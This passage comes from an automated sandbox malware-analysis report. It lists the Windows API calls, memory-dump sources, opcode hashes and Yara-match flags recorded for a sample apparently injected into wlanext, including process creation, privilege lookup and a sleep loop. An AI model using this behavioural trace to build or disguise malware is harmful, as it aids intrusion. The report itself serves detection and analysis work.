• String ID:
• API String ID: 2167126740-0
• Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction ID: add2db225ce935dc2c80b6e7776892d2bfc28f4233b37265f6fa32001e4b845b
• Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
• Instruction Fuzzy Hash: F9F015B2200208ABCB14DF89CC81EEB77ADAF8C754F118158BE0897241C630F810CBE0
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
• Instruction ID: e6c77262f5ba2182d122b5874ee39bb292c5f7eee28c199429390ea98cabeb31
• Opcode Fuzzy Hash: 4bff211391be707d7e89478abb6bff82e3a2567f710e9bf85143fd517881f32a
• Instruction Fuzzy Hash: 79B01272100940C7E309D724DD06F4B7210FFC0F01F008A3EA00B81851DA38A93CC846
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
• Instruction ID: cdb92b4df541c6703467cf01e2fb590a315ac15b2f911c24ec3250dccee83ae6
• Opcode Fuzzy Hash: 154562b1c1044579d2961e918a12e94c940bf0a0b9e8e44222bba29e99ad0489
• Instruction Fuzzy Hash: 64B01272200540C7E3099724D906B4B7310FB80F00F008D3AE04781892DB78992CD487
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
• Instruction ID: c22cab920426f99211259bec297b66dc94c7f77789dfa39603ac798b5fdced38
• Opcode Fuzzy Hash: 8f0c591c5e21216b00dee0cfdb8398dd80d2c6f9bc4c445cb98f30dfaa3fa1de
• Instruction Fuzzy Hash: 66B01272100544C7E349B714D906B8B7210FF80F00F00893AA00782861DB389A2CE996
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
• Instruction ID: b885d126f35a04098635745a666b93c7a8e67e4acbf17db3f6051f78ecae7b76
• Opcode Fuzzy Hash: a3c9a84db5a1b27ba292bbe6ac7156695ca75f7b31983341e9d88d14b699633e
• Instruction Fuzzy Hash: 9AB01273104944C7E349A714DD06B8B7210FBC0F01F00893AA00786851DB389A2CE986
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
• Instruction ID: bb22edd625d441e86b4201bf2007cb1784deb073e32f09f3a807e6c8f80ed535
• Opcode Fuzzy Hash: 34a2345e9ef716244e2d46a9efe759ea4b84b9c33e8f95bda4e579fccc15316f
• Instruction Fuzzy Hash: ACB01272104544C7F3099714ED06B8B7210FB80F00F00893AA007828A1DB39992CE456
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
• Instruction ID: 24e1bc86294fbd7a1654c33a96a754a721993c998c3fcb69f8e89524a52cb594
• Opcode Fuzzy Hash: 445a353fbf322f74478a6659fdc04cf8623378f6e443218e16a25411f5af12d5
• Instruction Fuzzy Hash: 54B01272201544C7E3099B14D906F8B7210FB90F00F00893EE00782851DB38D92CE447
APIs
Memory Dump Source
• Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
• Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
• Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
• Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
• Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
• Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                • Associated: 0000000E.00000002.923627309.0000000002020000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002110000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002120000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002124000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002127000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002130000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.923627309.0000000002190000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923627309.0000000002030000.00000040.00001000.00020000.00000000.sdmp, Offset: 02020000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_2020000_wlanext.jbxd
                                                                                Similarity
                                                                                • API ID: InitializeThunk
                                                                                • String ID:
                                                                                • API String ID: 2994545307-0

                                                                                Control-flow Graph (figure; legend: Executed / Not Executed): basic blocks 9a61d-9a718, with calls to RtlAllocateHeap, CreateProcessInternalW and the internal function at 9af40
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A63D
                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A714
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateCreateHeapInternalProcess
                                                                                • String ID: 6E
                                                                                • API String ID: 2739015735-729105364

                                                                                Control-flow Graph (figure; legend: Executed / Not Executed): basic blocks 99060-99182, with a Sleep call in a loop and calls to the internal functions at 9bd20, 9bdf0, 8acf0, 94e50, 98c80 and 98e90
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00099108
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229

                                                                                Control-flow Graph (figure; legend: Executed / Not Executed): basic blocks 9905c-99182, with a Sleep call in a loop and calls to the internal functions at 9bd20, 9bdf0, 8acf0, 94e50, 98c80 and 98e90
                                                                                APIs
                                                                                • Sleep.KERNELBASE(000007D0), ref: 00099108
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Sleep
                                                                                • String ID: net.dll$wininet.dll
                                                                                • API String ID: 3472027048-1269752229
                                                                                APIs
                                                                                • RtlAllocateHeap.NTDLL(6E,?,00094CAF,00094CAF,?,00094536,?,?,?,?,?,00000000,00000000,?), ref: 0009A63D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateHeap
                                                                                • String ID: 6E
                                                                                • API String ID: 1279760036-729105364
                                                                                • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction ID: d399c79ce600c54796ba727e8f0d5ef5832450f9807bf4129da0dcb5d5a9b158
                                                                                • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                • Instruction Fuzzy Hash: 59E012B2200208ABDB14EF99CC45EA777ACAF88754F118598BA085B242C630F9108AF0
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A67D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 7c9cd775f88a2e416991fa729ac62c95bbb6a2d6b23237fb40bc864ded1b0482
                                                                                • Instruction ID: b950ff5690d483ceb1087f7584adc38f8fb122cfbda9b60ee115cf77d2e3d39d
                                                                                • Opcode Fuzzy Hash: 7c9cd775f88a2e416991fa729ac62c95bbb6a2d6b23237fb40bc864ded1b0482
                                                                                • Instruction Fuzzy Hash: 15E0DFB81442815FDB00EF69D4848AB7BD1AF81314350899AF89D87613C235C65A9BA2
                                                                                APIs
                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A67D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FreeHeap
                                                                                • String ID: .z`
                                                                                • API String ID: 3298025750-1441809116
                                                                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction ID: bc8cfcb2c99894009c2587ad261f29bebf34a405a79fb46b909a0650bedf2706
                                                                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                • Instruction Fuzzy Hash: 4DE04FB12002046BDB14DF99CC49EE777ACEF88750F014554FD0857252C630F910CAF0
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: f9420b15ac48e6f8e0412ec754ec63907c4fc5812794d6f1f4b1ddae61453a07
                                                                                • Instruction ID: b8b446e9f3db850965a687365d8162680d56bf15b51db7187c079c3de754d16f
                                                                                • Opcode Fuzzy Hash: f9420b15ac48e6f8e0412ec754ec63907c4fc5812794d6f1f4b1ddae61453a07
                                                                                • Instruction Fuzzy Hash: EA01F931A802187AEB20B7949C43FFE776CAF42F54F044159FE44BB0C3DAA42A0687E1
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 9d4c15675667c892bffcd2134920723264ea120a0b7cfe49ad14a0b10ea46cd6
                                                                                • Instruction ID: 756c08928f44ea97a548b1d576e92f1d9b9861c61a57c45f328b22ac13de888a
                                                                                • Opcode Fuzzy Hash: 9d4c15675667c892bffcd2134920723264ea120a0b7cfe49ad14a0b10ea46cd6
                                                                                • Instruction Fuzzy Hash: C7018431A8022876EB20B6949C03FFE776C6B41F50F044115FF44BA1C2EA946A0647E6
                                                                                APIs
                                                                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008836A
                                                                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008838B
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: MessagePostThread
                                                                                • String ID:
                                                                                • API String ID: 1836367815-0
                                                                                • Opcode ID: 60cb94ee4478815d1569139e4e878a6e3ec7664dc24abf25297d965043f7c8d2
                                                                                • Instruction ID: c4375ef212196cfe365c8c7b9e8838ff9e70859d08b7001d8249dd4b74f7bcba
                                                                                • Opcode Fuzzy Hash: 60cb94ee4478815d1569139e4e878a6e3ec7664dc24abf25297d965043f7c8d2
                                                                                • Instruction Fuzzy Hash: 5BF082317812243AE62575542C03FFE625CAB42F51F14412AFF44EA1C2EAC8690217F6
                                                                                APIs
                                                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0008AD62
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Load
                                                                                • String ID:
                                                                                • API String ID: 2234796835-0
                                                                                • Opcode ID: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
                                                                                • Instruction ID: 4cc34915bca2b20621477e70c37c9eb44b2bacb3199b709f60a965b127b592a3
                                                                                • Opcode Fuzzy Hash: 665aa5374d654e9f9cb4486f19f2e7f437621091addfb796b1c9b3220067dc7e
                                                                                • Instruction Fuzzy Hash: 660175B5E4020DA7DF10EBE0DD42FDDB3B8AB54308F004195E90997642F630EB14DB91
                                                                                APIs
                                                                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A714
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateInternalProcess
                                                                                • String ID:
                                                                                • API String ID: 2186235152-0
                                                                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction ID: 0b046d0cb849595b28bdb4a0987b3705507a4643545d0aab2cd55ed715ad0575
                                                                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                • Instruction Fuzzy Hash: D901AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97251C630E851CBA4
                                                                                APIs
                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0008F050,?,?,00000000), ref: 000991CC
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateThread
                                                                                • String ID:
                                                                                • API String ID: 2422867632-0
                                                                                • Opcode ID: a2508597f785001f4e092b6b9c9eb41950eeb59147bc39573c54dbee2ee50ae3
                                                                                • Instruction ID: fb4ef361b822d3ff1b808260b5cb8a3b9c39fe2fa01eb090534f694250d9f97a
                                                                                • Opcode Fuzzy Hash: a2508597f785001f4e092b6b9c9eb41950eeb59147bc39573c54dbee2ee50ae3
                                                                                • Instruction Fuzzy Hash: E0E06D773812043AEA306599AC02FE7B29C9B81B24F14002AFA0DEA2C2D595F80142A4
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7E0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: f4b5c10cc493ab303e0a5d696356c1ef60461c6a2b6d1e8dd3cae4033645b4e8
                                                                                • Instruction ID: 67fa30e3e792d03937ce2e1769576997f3215a697ae9002d404e75daac57fa4a
                                                                                • Opcode Fuzzy Hash: f4b5c10cc493ab303e0a5d696356c1ef60461c6a2b6d1e8dd3cae4033645b4e8
                                                                                • Instruction Fuzzy Hash: 97E06DB52402086BDA10DF98CC85EE737A99F89714F018456FD085B245CA74E9118BF1
                                                                                APIs
                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1D2,0008F1D2,?,00000000,?,?), ref: 0009A7E0
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: LookupPrivilegeValue
                                                                                • String ID:
                                                                                • API String ID: 3899507212-0
                                                                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction ID: 149503f86da4cb15340531ae8684167c00a67653fa40501ca9045837131c8761
                                                                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                • Instruction Fuzzy Hash: 27E01AB12002086BDB10DF89CC85EE737ADAF89750F018164BA0857242C934E8108BF5
                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00008003,?,00088D14,?), ref: 0008F6FB
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Offset: 00080000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_80000_wlanext.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0
                                                                                • Opcode ID: e797cb99377808158f649d51d76da159360094e6e4faa1bd49258ab048ae41c1
                                                                                • Instruction ID: ed2a3b96cedebc315b72bcabaabe6c3ce6085ee93f5df0a30e066fe22c75f057
                                                                                • Opcode Fuzzy Hash: e797cb99377808158f649d51d76da159360094e6e4faa1bd49258ab048ae41c1
                                                                                • Instruction Fuzzy Hash: 08D0A7717503093BEB10FAA49C03F6632CCAB45B04F490074F948D73C3ED50F4014165
                                                                                APIs
                                                                                  • Part of subcall function 00C0B8D2: RpcImpersonateClient.RPCRT4(00000000), ref: 00C0B925
